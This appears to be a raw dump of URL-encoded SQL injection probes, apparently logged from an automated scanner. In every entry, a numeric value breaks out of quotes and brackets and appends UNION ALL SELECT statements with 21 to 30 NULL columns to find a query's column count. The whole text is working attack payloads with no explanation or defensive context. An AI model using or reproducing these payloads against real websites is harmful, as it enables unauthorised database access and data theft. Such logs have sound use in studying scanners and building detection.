1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HRkD%27%20LIKE%20%27HRkD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27LHvS%27%20LIKE%20%27LHvS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dSFC%27%20LIKE%20%27dSFC 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27xEvn%27%20LIKE%20%27xEvn 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27BERX%27%20LIKE%20%27BERX 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27zjEM%27%20LIKE%20%27zjEM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27brqj%27%20LIKE%20%27brqj 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27PhSP%27%20LIKE%20%27PhSP 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27AsVR%27%20LIKE%20%27AsVR 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VrRg%22%3D%22VrRg 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22qzWk%22%3D%22qzWk 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VDRG%22%3D%22VDRG 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22lGLH%22%3D%22lGLH 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22jDWV%22%3D%22jDWV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ukpb%22%3D%22ukpb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OanH%22%3D%22OanH 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22iWrP%22%3D%22iWrP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ZrRm%22%3D%22ZrRm 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tzyC%22%3D%22tzyC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22FueO%22%3D%22FueO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22BNtG%22%3D%22BNtG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ddTx%22%3D%22ddTx 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22DmMY%22%3D%22DmMY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22YPPQ%22%3D%22YPPQ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22guYh%22%3D%22guYh 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22BbKX%22%3D%22BbKX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22JXXF%22%3D%22JXXF 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ppui%22%3D%22ppui 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Vswq%22%3D%22Vswq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22yPQt%22%3D%22yPQt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22brEB%22%3D%22brEB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22URgS%22%3D%22URgS 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22YBOL%22%3D%22YBOL 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22rvzG%22%3D%22rvzG 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22hcHU%22%3D%22hcHU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ArvZ%22%3D%22ArvZ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ASYv%22%3D%22ASYv 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22gqdK%22%3D%22gqdK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22SHPJ%22%3D%22SHPJ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22VKro%22%3D%22VKro 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22UVsW%22%3D%22UVsW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22DBGM%22%3D%22DBGM 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XfOY%22%3D%22XfOY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22gJiC%22%3D%22gJiC 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22TsTO%22%3D%22TsTO 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EzXb%22%3D%22EzXb 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22DnmN%22%3D%22DnmN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22cSUZ%22%3D%22cSUZ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22kpHz%22%3D%22kpHz 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22JAkC%22%20LIKE%20%22JAkC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22rVPN%22%20LIKE%20%22rVPN 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22xuPy%22%20LIKE%20%22xuPy 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22KkVI%22%20LIKE%20%22KkVI 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22BWZn%22%20LIKE%20%22BWZn 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Rrpj%22%20LIKE%20%22Rrpj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22hzLJ%22%20LIKE%20%22hzLJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22kUJz%22%20LIKE%20%22kUJz 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22TBun%22%20LIKE%20%22TBun 